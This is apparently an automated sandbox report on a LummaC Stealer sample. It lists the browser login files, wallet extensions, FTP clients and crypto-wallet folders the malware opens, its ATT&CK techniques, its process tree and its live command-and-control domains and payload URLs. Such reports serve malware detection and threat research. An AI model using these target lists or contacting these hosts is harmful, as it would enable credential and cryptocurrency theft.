        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Tries to harvest and steal ftp login credentials
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Tries to steal Crypto Currency Wallets
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior

        Remote Access Functionality

        barindex
        Yara detected LummaC Stealer
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		11
        Deobfuscate/Decode Files or Information        		2
        OS Credential Dumping        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		11
        Input Capture        		13
        File and Directory Discovery        		Remote Desktop Protocol41
        Data from Local System        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Command and Scripting Interpreter        		Logon Script (Windows)12
        Process Injection        		2
        Obfuscated Files or Information        		Security Account Manager235
        System Information Discovery        		SMB/Windows Admin Shares11
        Input Capture        		3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login HookLogin Hook1
        DLL Side-Loading        		NTDS531
        Security Software Discovery        		Distributed Component Object Model1
        Clipboard Data        		114
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
        Masquerading        		LSA Secrets3
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
        Virtualization/Sandbox Evasion        		Cached Domain Credentials231
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
        Process Injection        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
        System Owner/User Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584737 Sample: Setup.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 95 yokesandusj.sbs 2->95 97 klipvumisui.shop 2->97 99 5 other IPs or domains 2->99 121 Suricata IDS alerts for network traffic 2->121 123 Found malware configuration 2->123 125 Antivirus detection for URL or domain 2->125 127 8 other signatures 2->127 14 Setup.exe 28 2->14         started        signatures3 process4 process5 16 cmd.exe 2 14->16         started        file6 75 C:\Users\user\AppData\Local\...\M.com, PE32 16->75 dropped 119 Drops PE files with a suspicious file extension 16->119 20 M.com 1 16->20         started        25 cmd.exe 1 16->25         started        27 cmd.exe 2 16->27         started        29 12 other processes 16->29 signatures7 process8 dnsIp9 101 yokesandusj.sbs 104.21.44.159, 443, 49842, 49846 CLOUDFLARENETUS United States 20->101 103 cegu.shop 185.161.251.21, 443, 49920 NTLGB United Kingdom 20->103 105 klipvumisui.shop 172.67.208.58, 443, 49927 CLOUDFLARENETUS United States 20->105 77 C:\Users\user\...\T0VC3MU5SNNFXQB43V5.exe, PE32 20->77 dropped 129 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->129 131 Suspicious powershell command line found 20->131 133 Query firmware table information (likely to detect VMs) 20->133 135 5 other signatures 20->135 31 T0VC3MU5SNNFXQB43V5.exe 2 20->31         started        35 powershell.exe 15 15 20->35         started        file10 signatures11 process12 file13 93 C:\Users\user\...\T0VC3MU5SNNFXQB43V5.tmp, PE32 31->93 dropped 107 Multi AV Scanner detection for dropped file 31->107 37 T0VC3MU5SNNFXQB43V5.tmp 3 5 31->37         started        109 Found many strings related to Crypto-Wallets (likely being stolen) 35->109 40 conhost.exe 35->40         started        signatures14 process15 file16 79 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 37->79 dropped 81 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 37->81 dropped 42 T0VC3MU5SNNFXQB43V5.exe 37->42         started        process17 file18 83 C:\Users\user\...\T0VC3MU5SNNFXQB43V5.tmp, PE32 42->83 dropped 45 T0VC3MU5SNNFXQB43V5.tmp 42->45         started        process19 file20 85 C:\Users\user\AppData\...\is-STFPD.tmp, PE32 45->85 dropped 87 C:\Users\user\...\BrightLib.exe (copy), PE32 45->87 dropped 89 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 45->89 dropped 91 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 45->91 dropped 48 BrightLib.exe 45->48         started        51 cmd.exe 45->51         started        53 cmd.exe 45->53         started        55 5 other processes 45->55 process21 signatures22 111 Tries to detect virtualization through RDTSC time measurements 48->111 113 Sample or dropped binary is a compiled AutoHotkey binary 48->113 115 Switches to a custom stack to bypass stack traces 48->115 117 Found direct / indirect Syscall (likely to bypass EDR) 48->117 57 conhost.exe 51->57         started        59 tasklist.exe 51->59         started        61 find.exe 51->61         started        63 conhost.exe 53->63         started        65 tasklist.exe 53->65         started        67 find.exe 53->67         started        69 conhost.exe 55->69         started        71 conhost.exe 55->71         started        73 8 other processes 55->73 process23

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Setup.exe8%VirustotalBrowse
        Setup.exe0%ReversingLabs

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe78%ReversingLabsWin32.Spyware.Lummastealer
        C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_isdecmp.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_isdecmp.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp0%ReversingLabs
        C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
        C:\Users\user\AppData\Roaming\ColorStreamLib\is-STFPD.tmp8%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://dfgh.online/invoker.php?compName=user-PC100%Avira URL Cloudmalware
        yokesandusj.sbs0%Avira URL Cloudsafe
        https://yokesandusj.sbs/api0%Avira URL Cloudsafe
        http://michaeluno.jp/H0%Avira URL Cloudsafe
        https://jrsoftware.org00%Avira URL Cloudsafe
        https://jrsoftware.org/0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        cegu.shop
        		185.161.251.21
        		truefalse
          		high
          yokesandusj.sbs
          		104.21.44.159
          		truetrue
            		unknown
            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
            		217.20.57.18
            		truefalse
              		high
              klipvumisui.shop
              		172.67.208.58
              		truefalse
                		high
                iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDq
                		unknown
                		unknownfalse
                  		unknown
                  dfgh.online
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    yokesandusj.sbstrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://klipvumisui.shop/int_clp_sha.txtfalse
                      		high
                      rabidcowse.shopfalse
                        		high
                        wholersorie.shopfalse
                          		high
                          https://yokesandusj.sbs/apitrue
                          • Avira URL Cloud: safe
                          		unknown
                          cloudewahsj.shopfalse
                            		high
                            noisycuttej.shopfalse
                              		high
                              nearycrepso.shopfalse
                                		high
                                https://cegu.shop/8574262446/ph.txtfalse
                                  		high
                                  framekgirus.shopfalse
                                    		high
                                    tirepublicerj.shopfalse
                                      		high
                                      abruptyopsn.shopfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabM.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUT0VC3MU5SNNFXQB43V5.exe, 00000013.00000000.2614777068.0000000000341000.00000020.00000001.01000000.0000000A.sdmp, T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                            		high
                                            https://certs.securetrust.com/CA0:T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
